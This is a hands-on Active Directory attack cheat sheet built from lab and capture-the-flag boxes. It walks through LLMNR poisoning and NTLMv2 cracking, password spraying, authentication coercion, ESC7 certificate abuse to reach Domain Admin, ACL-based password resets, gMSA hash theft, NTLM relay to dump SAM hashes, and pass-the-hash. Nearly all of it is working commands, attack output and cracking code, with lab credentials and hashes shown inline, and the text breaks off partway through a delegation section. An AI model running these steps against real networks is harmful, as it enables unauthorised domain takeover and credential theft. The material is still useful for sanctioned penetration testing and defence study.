Active Directory Windows Attacks

  • Reconnaissance (unauthenticated)
  • Lateral movement (authenticated)
  • Privilege escalation

Introduction & Scope

Context: assumed-breach scenario on an internal organisation network, with an attacker-controlled (rogue) device plugged into the internal LAN and no credentials to start with.


Reconnaissance Unauthenticated

Initial Network Enumeration

  • ip a - network interface details: identify your own IP address and subnet mask
  • ip r (or ip route show) - routing table: default gateway and the directly connected network range
  • netstat -rn - the same routing table on hosts without iproute2

Passive Reconnaissance

Capture SMB, DNS, Kerberos, LLMNR (UDP 5355) and NBT-NS (UDP 137) traffic without sending anything yourself; the hosts, domain name and name-resolution requests seen here drive the poisoning step below.

tcpdump -i eth1 -n 'port 53 or port 88 or port 445 or udp port 137 or udp port 5355'  # DNS, Kerberos, SMB, NBT-NS, LLMNR

Active Host Discovery

Ping sweep and full TCP port scan. Windows hosts often drop ICMP echo, so a host missing from the sweep is not necessarily down; the -p- scan runs against a curated host list (hosts-lab-net.txt, one IP per line).

nmap -sn 192.168.211.0/24                                 # ICMP/ARP ping sweep
nmap -p- --open -sS -T4 -n -v -iL hosts-lab-net.txt       # all 65535 TCP ports, open only, no DNS

Detect Active Directory Domain

cat /etc/resolv.conf  # Look for domain name
nslookup -type=SRV _ldap._tcp.dc._msdcs.lab.net

Active Directory (AD) discovery: scan the ports that identify domain controllers (DNS 53, Kerberos 88, RPC 135, NetBIOS 139, LDAP 389, SMB 445, kpasswd 464, RPC over HTTP 593, LDAPS 636, Global Catalog 3268/3269, RDP 3389, WinRM 5985/5986):

sudo nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,5986 -sV 192.168.211.0/24 --open

LLMNR/NBT-NS Poisoning Unauthenticated

Capturing Hashes - Unauthenticated

Responder answers LLMNR/NBT-NS/mDNS queries for names that do not exist and captures the Net-NTLMv2 responses clients send when they try to authenticate to it. Useful flags:

  • -w, --wpad Start the WPAD rogue proxy server.
  • -F, --ForceWpadAuth Force NTLM/Basic authentication on wpad.dat file retrieval. This may cause a login prompt on the victim, so it is noisy.
  • -v, --verbose Increase verbosity.

sudo responder -I eth1 -v -wF

responder-ntlmv2-ssp-hash.png

Crack captured NTLMv2 hashes

A Net-NTLMv2 response is a challenge/response value, not the NT hash itself, so it cannot be passed but can be cracked offline. john and hashcat (mode 5600) accept Responder's USER::DOMAIN:challenge:proof:blob line as-is:

john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt captured.ntlmv2

hashcat -m 5600 -a 0 captured.ntlmv2 /usr/share/wordlists/rockyou.txt
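As an added example (not part of the original page), the following Python shows what hashcat mode 5600 actually checks: it parses Responder's USER::DOMAIN:challenge:NTProofStr:blob line, recomputes NTProofStr = HMAC-MD5(NTOWFv2, challenge || blob) for each candidate password, and decodes the AV_PAIR list inside the blob (target name, timestamp, and the MIC-present flag that CVE-2019-1040 strips). The sample capture, its challenge values and the weak password "password" are constructed here; the MD4 routine is included because OpenSSL 3 builds of Python usually refuse hashlib.new("md4").

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF

def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK

def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib on OpenSSL 3 usually lacks md4)."""
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    hh = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), range(16)),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (hh, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, k, shifts, order in rounds:
            for i, j in enumerate(order):
                a = _rotl((a + fn(b, c, d) + x[j] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c      # rotate registers: the next step updates the old d
        h = [(v + w) & MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)

def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))   # NTOWFv1: the 'nthash' secretsdump prints

def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    # MS-NLMP 3.3.2: HMAC_MD5(NT hash, UTF-16LE(UPPER(user) + domain)); domain keeps the case the client sent
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()

def nt_proof(ntowf: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    return hmac.new(ntowf, server_challenge + blob, hashlib.md5).digest()

AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName", 4: "DnsDomainName",
            5: "DnsTreeName", 6: "Flags", 7: "Timestamp", 9: "TargetName", 10: "ChannelBindings"}

def build_blob(filetime: int, client_challenge: bytes, av_pairs) -> bytes:
    """NTLMv2_CLIENT_CHALLENGE ('temp' in MS-NLMP): the part Responder prints after the NTProofStr."""
    out = b"\x01\x01" + bytes(6) + struct.pack("<Q", filetime) + client_challenge + bytes(4)
    for av_id, value in av_pairs:
        out += struct.pack("<HH", av_id, len(value)) + value
    return out + struct.pack("<HH", 0, 0) + bytes(4)    # MsvAvEOL terminator + trailing Z(4)

def parse_av_pairs(blob: bytes) -> dict:
    pos, pairs = 28, {}                 # 2 + 6 + 8 + 8 + 4 fixed bytes precede the AV_PAIR list
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:
            return pairs
        value = blob[pos:pos + av_len]
        pos += av_len
        if av_id in (1, 2, 3, 4, 5, 9):
            value = value.decode("utf-16le")
        elif av_id == 6:
            value = struct.unpack("<I", value)[0]   # bit 0x2 = MIC present (what CVE-2019-1040 removes)
        elif av_id == 7:
            value = struct.unpack("<Q", value)[0]
        pairs[AV_NAMES.get(av_id, av_id)] = value

def parse_hash_line(line: str) -> dict:
    user, _, domain, chal, proof, blob = line.strip().split(":", 5)   # hashcat -m 5600 layout
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(chal),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}

def verify_candidate(line: str, password: str) -> bool:
    h = parse_hash_line(line)
    key = ntowf_v2(password, h["user"], h["domain"])
    return hmac.compare_digest(nt_proof(key, h["challenge"], h["blob"]), h["proof"])

def crack(line: str, wordlist):
    """Dictionary attack: the first candidate whose recomputed NTProofStr matches, else None."""
    return next((w for w in wordlist if verify_candidate(line, w)), None)

def make_sample_line(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    proof = nt_proof(ntowf_v2(password, user, domain), server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"

# Constructed sample: what Responder would log for LAB\weakuser (password "password") hitting a poisoned
# SMB name; the server challenge, client nonce and FILETIME timestamp are made-up values.
SAMPLE_BLOB = build_blob(132_860_000_000_000_000, bytes.fromhex("8877665544332211"), [
    (2, "LAB".encode("utf-16le")), (1, "MEMBER2022".encode("utf-16le")),
    (4, "lab.net".encode("utf-16le")), (3, "member2022.lab.net".encode("utf-16le")),
    (7, struct.pack("<Q", 132_860_000_000_000_000)), (6, struct.pack("<I", 2)),
    (9, "cifs/member2022.lab.net".encode("utf-16le")),
])
SAMPLE_LINE = make_sample_line("weakuser", "LAB", "password", bytes.fromhex("1122334455667788"), SAMPLE_BLOB)
```

Run it with `python3 -c 'import ntlmv2_demo as d; print(d.SAMPLE_LINE); print(d.crack(d.SAMPLE_LINE, ["letmein", "Password1", "password"]))'` (file name assumed). The AV_PAIR decode is the useful part on a real capture: MsvAvTargetName tells you which service the victim thought it was talking to, and a Flags value without bit 0x2 means the client sent no MIC, which is the condition the CVE-2019-1040 scanner above tests for.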

RID Cycling Enumeration - Unauthenticated

Get valid user accounts by RID cycling over the LSA lookup interface (anonymous or guest SMB access):

impacket-lookupsid anonymous@manager.htb -no-pass

Using netexec rid-brute function:

sudo nxc smb 10.129.45.217 -u 'guest' -p '' --rid-brute

unauth-user-list-brute-rid-force-enum.png

User Enumeration and Brute Forcing

Kerbrute userenum sends AS-REQs without pre-authentication to the Kerberos service (port 88) and tells valid from invalid usernames by the KDC error code; it does not increment badPwdCount, so a long word list is safe to use:

./kerbrute_linux_amd64 userenum --dc 10.129.45.217 -d manager.htb ./userlist.txt

netexec with Kerberos authentication (-k) is less clean for enumeration: KDC_ERR_PREAUTH_FAILED means the username exists (the password was wrong), KDC_ERR_C_PRINCIPAL_UNKNOWN means it does not. Unlike kerbrute, each attempt here is a real failed logon and counts against the lockout threshold:

netexec smb dc01.manager.htb -k -u userlist.txt -p 'RandomPassword'

KDC_ERR_PREAUTH_FAILED.png

Note: Kerberos rejects requests whose clock differs from the DC by more than 5 minutes (KRB_AP_ERR_SKEW), so sync the Kali host's clock with the target Domain Controller first:

sudo ntpdate dc01.manager.htb

Spray Username as Password

Feed the same list as both user file and password file. --no-bruteforce pairs line N of the user file with line N of the password file (user = password) instead of trying every combination, and --continue-on-success keeps going after a hit:

netexec smb manager.htb -u valid_usernames.txt -p valid_usernames.txt --no-bruteforce --continue-on-success

netexec-username-as-password.png

Validate a hit (here operator:operator) against a service the account can reach, for example MSSQL with Windows authentication:

impacket-mssqlclient manager/operator:operator@manager.htb -windows-auth

Password Spraying

Spray a single weak password across all usernames. One attempt per user per lockout observation window stays under any sane lockout threshold; read the password policy (--pass-pol, below) before a second round:

nxc smb dc2022.lab.net -u list_of_users.txt -p 'Password1' --continue-on-success

Lateral Movement Authenticated

Post-compromise Active Directory enumeration: with one valid credential the tools below reveal the structure of the domain (shares, policy, ACLs, certificate services).

SMB client with AD domain authentication to a share:

smbclient -U levi.james@puppy.htb //10.10.11.70/DEV

When NTLM authentication is disabled on the DC, generate a krb5.conf for the domain, install it, and authenticate with Kerberos (-k):

nxc smb dc.voleur.htb --generate-krb5-file voleur.krb
cat voleur.krb
sudo cp voleur.krb /etc/krb5.conf
nxc smb dc.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k

AD Password Policy Authenticated

Read the Active Directory password policy (minimum length, complexity, lockout threshold and observation window) to scope further password spraying and to prune cracking rules:

nxc smb dc2022.lab.net -u FGFS_BusProjMgr -p 'P@ssw0rd123456' --pass-pol

Vulnerability Scan Authenticated

Authenticated vulnerability checks against the targets with a low-privilege domain credential.

Determine whether targets are vulnerable to known Windows bugs and to coercion/relay attacks with the netexec modules:

netexec smb dc2022.lab.net -u weakuser -p Password1 -d lab.net -M zerologon

netexec smb dc2022.lab.net -u weakuser -p Password1 -d lab.net -M nopac

netexec smb dc2022.lab.net -u weakuser -p Password1 -d lab.net -M printnightmare

netexec smb dc2022.lab.net -u weakuser -p Password1 -d lab.net -M smbghost  

netexec smb dc2022.lab.net -u weakuser -p Password1 -d lab.net -M ms17-010

netexec smb dc2022.lab.net -u weakuser -p Password1 -d lab.net -M coerce_plus -o LISTENER=192.168.211.117

YouTube Video: SANS Workshop NTLM Relaying 101 Internal Pentesters Compromise Domains

coerce_plus stops at the first method that coerces an authentication; add ALWAYS=true to run every method regardless, or METHOD=... to pick a single one:

netexec smb ca22.lab.net -u weakuser -p Password1 -d lab.net -M coerce_plus -o LISTENER=192.168.211.117 ALWAYS=true
netexec smb member2022.lab.net -u weakuser -p Password1 -d lab.net  -M coerce_plus -o METHOD=PetitPotam ALWAYS=true

netexec_coerce_plus_module_relay-to-responder.png

Scan for CVE-2019-1040 ("Drop the MIC"): an unpatched target accepts an NTLM AUTHENTICATE message whose Message Integrity Check has been stripped, which lets a man-in-the-middle relay attacker remove the signing requirement on relayed sessions (for example SMB to LDAP):

python /home/kali/Downloads/lab.net/cve-2019-1040-scanner/scan.py lab/weakuser:Password1@dc2022.lab.net

[*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth
[*] Target dc2022.lab.net is not vulnerable to CVE-2019-1040

Check whether the Print Spooler RPC interface (MS-RPRN, the PrinterBug coercion primitive) is exposed on the target:

/home/kali/Downloads/lab.net/rpcdump.py 10.10.10.10 | grep -A 6 "spoolsv"

ESC7 Certificate Authority

Exploitation of the CA installed on the manager.htb Domain Controller. Start by asking certipy for vulnerable CA and template configurations:

certipy-ad find -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.45.217 -stdout -vulnerable

The output flags ESC7, meaning the owned user holds dangerous rights (ManageCA) on the CA itself:

[!] Vulnerabilities
      ESC7                              : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates                   : [!] Could not find any certificate templates

CA ESC7 Exploit Steps:

  1. With ManageCA, add the owned account as a CA "officer" (ManageCertificates right), so it can issue and manage certificate requests.
certipy-ad ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.45.217 -ca manager-dc01-ca -add-officer raven -debug
  2. Enable the built-in SubCA template on the CA with -enable-template (it allows an enrollee-supplied subject, but issuance is denied to ordinary users, which is why step 5 is needed).
certipy-ad ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.45.217 -ca manager-dc01-ca -enable-template subca
  3. List the templates published on the CA with -list-templates to confirm SubCA is present.
certipy-ad ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.45.217 -ca manager-dc01-ca -list-templates
  4. Prerequisites fulfilled (ManageCA, officer rights, SubCA enabled). Request a certificate from the SubCA template with the administrator UPN; the request is denied, note the request ID it prints.
certipy-ad req -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.45.217 -ca manager-dc01-ca -template SubCA -upn administrator@manager.htb
  5. As an officer, manually issue the denied request with the ca command and -issue-request <request ID>.
certipy-ad ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.45.217 -ca manager-dc01-ca -issue-request 19
  6. Retrieve the now-issued certificate with req and -retrieve <request ID>; certipy saves administrator.pfx.
certipy-ad req -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.45.217 -ca manager-dc01-ca -retrieve 19
  7. Sync time with the target (the PKINIT logon fails on clock skew).
sudo ntpdate -s manager.htb
  8. With the administrator PFX in hand, authenticate via PKINIT; certipy obtains a TGT and prints the account's NT hash.
certipy-ad auth -pfx administrator.pfx
  9. Pass the NT hash to gain Domain Admin access.
evil-winrm -i manager.htb -u administrator -H ae5064c2f62317332c88629e025924ef

esc7-Certificate-Authority-Exploit-steps.png

In Active Directory Certificate Services (AD CS), ESC7 and ESC8 are privilege escalation techniques against the certificate authority itself rather than against a template: ESC7 abuses dangerous CA permissions (ManageCA / ManageCertificates) to get certificates issued that would otherwise be denied, and ESC8 relays coerced NTLM authentication to an HTTP enrollment endpoint. Both take a low-privileged user to Domain Admin or to full domain compromise.

Coercing Authentication

Coerce Types

Coercion techniques and where they work:

  • PetitPotam (MS-EFSR): any Windows host exposing the EFS RPC interface
  • PrinterBug (MS-RPRN): any host running the Print Spooler service
  • ShadowCoerce (MS-FSRVP): hosts with the File Server VSS Agent role
  • DFSCoerce (MS-DFSNM): Domain Controllers (DFS Namespace service)

All of them make the victim's machine account authenticate to a host of the attacker's choosing, here the Kali Responder listener, and that authentication is then captured or relayed.

PetitPotam - Authenticated

  • -d, --domain DOMAIN valid domain name
  • positional arguments:
    • listener ip address or hostname of listener
    • target ip address or hostname of target

With Responder still running on Kali 192.168.211.117 listener: sudo responder -I eth1 -v

Run PetitPotam and instruct the domain controller to connect to Kali, using the provided AD credentials to reach the EFS RPC interface:

sudo ./PetitPotam.py -u weakuser -p Password1 -d lab.net 192.168.211.117 dc2022.lab.net

petitPotam-relay-to-responder.png

Result: the captured Net-NTLMv2 response of the domain controller's computer account, DC2022$ at 192.168.211.133:

[SMB] NTLMv2-SSP Client   : 192.168.211.133
[SMB] NTLMv2-SSP Username : LAB\DC2022$
[SMB] NTLMv2-SSP Hash     : DC2022$::LAB:8958d4ec02a281d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

Cracking a computer account's Net-NTLMv2 response is not realistic: machine passwords are 120-character random strings rotated every 30 days. The value of this capture lies in relaying the authentication instead of cracking it, which the following sections cover.

Coercer Tool

https://github.com/p0dalirius/Coercer

python3 -m venv $(pwd)/exploit-venv          # no sudo needed: a root-owned venv only causes permission trouble
source $(pwd)/exploit-venv/bin/activate
python3 -m pip install coercer
coercer -h

Scan the target's RPC interfaces to determine which of the known coercion methods can be leveraged to force an authentication:
scan - tests the known methods with known working paths on all interfaces and reports when an authentication is received on the listener.

sudo coercer scan -t 192.168.211.133 -u weakuser -p Password1 -d lab.net -v

scan coercer-tool.png

Next, use the coercer exploit mode against the Remote Procedure Call (RPC) interfaces of a remote machine to coerce an authentication to ntlmrelayx or Responder.


Active Directory Enumeration

Collectors to Extract Active Directory info using Bloodhound or Rusthound:

rusthound-ce --domain certificate.htb -u lion.sk -p '!QAZ2wsx' -z
bloodhound-python -u 'weakuser' -p 'Password1' -dc dc2022.lab.net -d lab.net -c all

Computer Account Admin

One computer account holding local administrator rights on another computer is common around SCCM/Configuration Manager site servers and other management products. It matters because a coerced authentication from the first machine can be relayed to the second with full local admin rights.
BloodHound Cypher Raw Queries Cheatsheet

Find computer accounts that are admin to another computer (directly or through group membership) with BloodHound raw queries:

MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[:AdminTo]->(c2:Computer) RETURN p

MATCH p=(c1:Computer)-[:AdminTo]->(c2:Computer) RETURN p

MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p
MATCH (c1:Computer)-[r:AdminTo|GenericAll]->(c2:Computer)
RETURN c1.name AS SourceComputer, type(r) AS AccessType, c2.name AS TargetComputer

Bloodhound Queries: Computer Lists Admin Rights

The relay attack described below is possible wherever a computer account has administrative access to another computer within Active Directory.

Users Generic Write All

Abuse GenericWrite over a group with bloodyAD to add a user to it. The sub-command name groupMember is case-sensitive:

bloodyAD --host puppy.htb -d puppy.htb -u levi.james -p 'KingofAkron2025!' add groupMember DEVELOPERS levi.james

User olivia holds GenericAll over user michael in AD, which includes the right to reset his password (destructive: the old password is replaced, so record it for the report).
Set a new password for michael using bloodyAD:

bloodyAD -u "olivia" -p "ichliebedich" -d "lab.net" --host dc.lab.net set password "Michael" "ichliebedich"

ForceChangePassword

The ForceChangePassword right over another user allows resetting that user's password without knowing the current one:

bloodyAD -u "Michael" -p "12345678" -d "lab.net" --host dc.lab.net set password "Benjamin" "ichliebedich"
bloodyAD -u mark.bbond -p '1day@atime' -d 'mirage.htb' --host dc01.mirage.htb -k get object javier.mmarshall
bloodyAD -u mark.bbond -p '1day@atime' -d 'mirage.htb' --host dc01.mirage.htb -k set password javier.mmarshall 'Password123!'

bloodyAD-set-password.png

Enable Disabled User

bloodyAD -u mark.bbond -p '1day@atime' -d 'mirage.htb' --host dc01.mirage.htb -k remove uac javier.mmarshall -f ACCOUNTDISABLE

Set Allowed Logon Hours

Check which attributes of other users are writable, then inspect the target's logonHours:

bloodyAD -u mark.bbond -p '1day@atime' -d 'mirage.htb' --host dc01.mirage.htb -k get object javier.mmarshall | grep -i hour -a
bloodyAD -u mark.bbond -p '1day@atime' -d 'mirage.htb' --host dc01.mirage.htb -k get writable --detail

Set logonHours to all ones (the value is base64 of 21 bytes of 0xFF, one bit per hour of the week) so the account may log on at any time:

bloodyAD -u mark.bbond -p '1day@atime' -d 'mirage.htb' --host dc01.mirage.htb -k set object javier.mmarshall logonHours -v ////////////////////////////  --b64

Watch out: blue teams use changes to logonHours as a honeytoken trigger!
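As an added example (not part of the original page or of bloodyAD), this Python decodes and builds the logonHours value written above. The 28 slashes are base64 for 21 bytes of 0xFF: 168 one-bits, one per hour of the week, so the account may log on at any hour. The bit-to-hour mapping (Sunday 00:00 UTC first, least-significant bit of each byte first) follows Microsoft's documented layout and is an assumption of this snippet; the weekday business-hours schedule is constructed to show how many hours such a change opens up, which is exactly what a honeytoken alert on this attribute keys on.

```python
import base64

DAYS = ("Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat")
ALL_HOURS = "/" * 28   # 28 base64 chars of '/' (value 63 = 0b111111) -> 168 one-bits -> 21 bytes of 0xFF

def decode_logon_hours(value_b64: str) -> list:
    """Return 168 booleans, one per hour of the week, from a base64 logonHours value."""
    raw = base64.b64decode(value_b64)
    if len(raw) != 21:
        raise ValueError(f"logonHours must be 21 bytes (168 hours), got {len(raw)}")
    # Assumed mapping (Microsoft's documented one): bit n = hour n counted from Sunday 00:00 UTC,
    # least-significant bit of each byte first. The DC applies its own time-zone bias when enforcing.
    return [bool((raw[n // 8] >> (n % 8)) & 1) for n in range(168)]

def encode_logon_hours(allowed) -> str:
    """Inverse of decode_logon_hours: 168 booleans -> base64 value ready for 'set object ... --b64'."""
    raw = bytearray(21)
    for n, ok in enumerate(allowed):
        if ok:
            raw[n // 8] |= 1 << (n % 8)
    return base64.b64encode(bytes(raw)).decode()

def business_hours(start: int = 8, end: int = 18) -> list:
    """Constructed schedule: Mon-Fri start..end UTC, the kind of restriction put on a helpdesk account."""
    return [DAYS[n // 24] not in ("Sat", "Sun") and start <= n % 24 < end for n in range(168)]

def describe(allowed) -> dict:
    """Collapse the bitmap into per-day hour ranges, e.g. {'Mon': '08-18', 'Sat': 'none', ...}."""
    out = {}
    for d, name in enumerate(DAYS):
        ranges, start = [], None
        for h, ok in enumerate(list(allowed[d * 24:(d + 1) * 24]) + [False]):
            if ok and start is None:
                start = h
            elif not ok and start is not None:
                ranges.append(f"{start:02d}-{h:02d}")
                start = None
        out[name] = ",".join(ranges) or "none"
    return out

def newly_allowed(before_b64: str, after_b64: str) -> int:
    """Number of hours a change opens up; a restricted schedule jumping to all 168 is the alert condition."""
    before, after = decode_logon_hours(before_b64), decode_logon_hours(after_b64)
    return sum(1 for n in range(168) if after[n] and not before[n])

if __name__ == "__main__":
    restricted = encode_logon_hours(business_hours())
    print(restricted, describe(decode_logon_hours(restricted)))
    print(ALL_HOURS, describe(decode_logon_hours(ALL_HOURS)))
    print("hours opened by the bloodyAD change:", newly_allowed(restricted, ALL_HOURS))
```

Feed the current value from `get object ... logonHours` into decode_logon_hours to see what the account was restricted to before touching it; if the answer is a narrow window, the attribute is more likely to be watched.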

Read gMSA Password Permission

A Group Managed Service Account (gMSA) is a domain-managed service account whose long random password is rotated by the DC and stored in the msDS-ManagedPassword attribute, readable only by the principals listed in msDS-GroupMSAMembership. If the compromised user is one of them, nxc --gmsa reads the blob and prints the NT hash derived from the current password:

nxc ldap <ip> -u javier.mmarshall -p '1day@atime' -k --gmsa

Use the stolen NT hash to request a TGT (overpass-the-hash) instead of an NTLM logon:

getTGT.py -hashes ':738eeff47da231dec805583638b8a91f' 'mirage.htb/mirage-service$'

KRB5CCNAME=mirage-service\$.ccache bloodyAD --host dc01.mirage.htb -d mirage.htb -u 'mirage-service$' -k get writable --detail

The output shows where this account has WRITE permission on other user objects, for attributes such as servicePrincipalName and userPrincipalName.
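As an added example (not part of the original page or of netexec), this Python parses the MSDS-MANAGEDPASSWORD_BLOB structure that nxc --gmsa reads from msDS-ManagedPassword: a 16-byte header of offsets, the current and optional previous password as NUL-terminated UTF-16LE, and two 100-nanosecond intervals that say when the DC will rotate it. The blob here is constructed with a short password for the demonstration; real ones carry a long random string, and the NT hash nxc prints is MD4 over exactly the current-password bytes this parser returns.

```python
import struct

# MS-ADTS 2.2.19: Version, Reserved, Length, CurrentPasswordOffset, PreviousPasswordOffset,
# QueryPasswordIntervalOffset, UnchangedPasswordIntervalOffset (all little-endian)
HEADER = struct.Struct("<HHIHHHH")
TICKS_PER_DAY = 10_000_000 * 86_400   # the intervals are 64-bit counts of 100-ns units

def build_managed_password_blob(current: str, previous, requery_after_days: float, unchanged_for_days: float) -> bytes:
    """Build a version-1 blob the way a DC lays it out (constructed test data; real passwords are long and random)."""
    cur = current.encode("utf-16le") + b"\x00\x00"             # each password is NUL-terminated UTF-16LE
    prev = previous.encode("utf-16le") + b"\x00\x00" if previous else b""
    cur_off = HEADER.size
    prev_off = cur_off + len(cur) if prev else 0                # 0 means no previous password is present
    query_off = cur_off + len(cur) + len(prev)
    unchanged_off = query_off + 8
    body = cur + prev + struct.pack("<QQ", int(requery_after_days * TICKS_PER_DAY),
                                    int(unchanged_for_days * TICKS_PER_DAY))
    return HEADER.pack(1, 0, HEADER.size + len(body), cur_off, prev_off, query_off, unchanged_off) + body

def parse_managed_password_blob(blob: bytes) -> dict:
    """Decode msDS-ManagedPassword; the 'current_password' bytes are what gets MD4-hashed into the NT hash."""
    version, _reserved, length, cur_off, prev_off, query_off, unchanged_off = HEADER.unpack_from(blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not a version-1 MSDS-MANAGEDPASSWORD_BLOB")
    current = blob[cur_off:prev_off or query_off]               # runs up to the next field, terminator included
    previous = blob[prev_off:query_off] if prev_off else b""
    requery = struct.unpack_from("<Q", blob, query_off)[0]
    unchanged = struct.unpack_from("<Q", blob, unchanged_off)[0]
    return {
        "current_password": current[:-2],                       # strip the UTF-16LE NUL terminator, as nxc does
        "previous_password": previous[:-2] if previous else b"",
        "requery_after_days": requery / TICKS_PER_DAY,          # the DC rotates after this: re-dump before then
        "unchanged_for_days": unchanged / TICKS_PER_DAY,        # how long queries keep returning this password
    }

if __name__ == "__main__":
    blob = build_managed_password_blob("password", "oldpassword", 5, 25)
    info = parse_managed_password_blob(blob)
    print(blob.hex())
    print(info["current_password"].decode("utf-16le"), info["requery_after_days"], info["unchanged_for_days"])
```

The previous password matters operationally: a service ticket encrypted with the old key is still honoured for a while after rotation, and the previous-password slot is how the DC keeps that working, so a dump taken right after rotation still yields two usable keys.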

Targeted Kerberoasting attack

After locating a Password Safe backup file and cracking it with pwsafe2john Backup.psafe3, Emily's password was found. Emily has write access to the Ethan user account, so a targeted Kerberoasting attack is possible: add an SPN to Ethan, request a service ticket for it and crack the ticket offline.
targetedKerberoast.py sets a temporary SPN, prints the kerberoast hash, and deletes the SPN again:

sudo ntpdate dc.administrator.htb
python targetedKerberoast.py -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" -d "administrator.htb" --dc-ip 10.129.44.50

Relay Attacks

NTLM Relay

NTLM relay attacks forward a victim's NTLM authentication to Spooler, SMB, LDAP or other AD services that accept it. The victim is brought to us either by poisoning (it resolves a non-existent hostname and authenticates to our box) or by a coercion primitive such as PetitPotam. The NTLM exchange itself is relayed, not a hash, and the target must not enforce SMB signing (or LDAP signing / channel binding for LDAP targets).

-tf TARGETSFILE File that contains targets by hostname or full URL, one per line

targetfile-dns-hosts-names.txt:

dc2022.lab.net
ca22.lab.net
member2022.lab.net
ws11.lab.net

Start impacket-ntlmrelayx on the Kali attacker. Make sure Responder is not running (or has its SMB and HTTP servers disabled in Responder.conf), otherwise it occupies the ports ntlmrelayx needs.

impacket-ntlmrelayx -t member2022.lab.net -smb2support

impacket-ntlmrelayx redirects every incoming authentication to the target member2022.lab.net; -smb2support is needed because modern Windows clients speak SMB2/3.

Run PetitPotam against the domain controller dc2022 with the weak credentials, pointing it at Kali 192.168.211.117 so that ntlmrelayx forwards the DC's authentication to the member2022 server:

python3 PetitPotam.py -u weakuser -p Password1 -d lab.net 192.168.211.117 dc2022.lab.net

computer-account-admin-to-another-computer-petitpotam-to-ntlmrelayx.png

The SAM hash dump of host member2022 succeeds because DC2022$ is a local admin on the member server (and SMB signing is not required there). Output:

[*] Target system bootKey: 0x427aff60178424877f0f652e0d2cf307
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:ead64f747aa274494d65957f8593d0f1:::
[*] Done dumping SAM hashes for host: member2022.lab.net

Abuse the stolen NTLM hash with pass-the-hash technique:

wget https://raw.githubusercontent.com/fortra/impacket/refs/heads/master/examples/wmiexec.py
python3 wmiexec.py -hashes :e19ccf75ee54e06b06a5907af13cef42 Administrator@member2022.lab.net

wmiexec-pass-the-hash-after-relay.png

YouTube Video: Hactivity - The Power of Coercion Techniques in Windows Environments

Remote Potato Relay Attack

RemotePotato0

Cross-session relay for privilege escalation: from a low-privilege shell on a Windows host where a privileged user has an interactive session, RemotePotato0 triggers a DCOM activation in that session and relays the resulting NTLM authentication (or captures its NTLMv2 response) through the attacker's box.

on Kali

sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{KALI-IP}}:9999

On low privilege compromised host:

.\RemotePotato0.exe -m 2 -x <KALI IP> -s 1

The captured NTLMv2 response of the logged-on user can then be cracked offline:

hashcat -m 5600 NetNTLMv2.hash rockyou.txt

Kerberos

Quick Kerberoast: request service tickets for every account with an SPN and write the hashes to a file:

nxc ldap dc.puppy.htb -u levi.james -p 'KingofAkron2025!' --kerberoasting krb.txt

Unconstrained Delegation

member2022 has unconstrained delegation, so every account that authenticates to it with Kerberos leaves a copy of its TGT in LSASS. Coerce the Domain Controller to connect to the member server (by hostname, so Kerberos rather than NTLM is used) to make sure there is a DC ticket to steal:

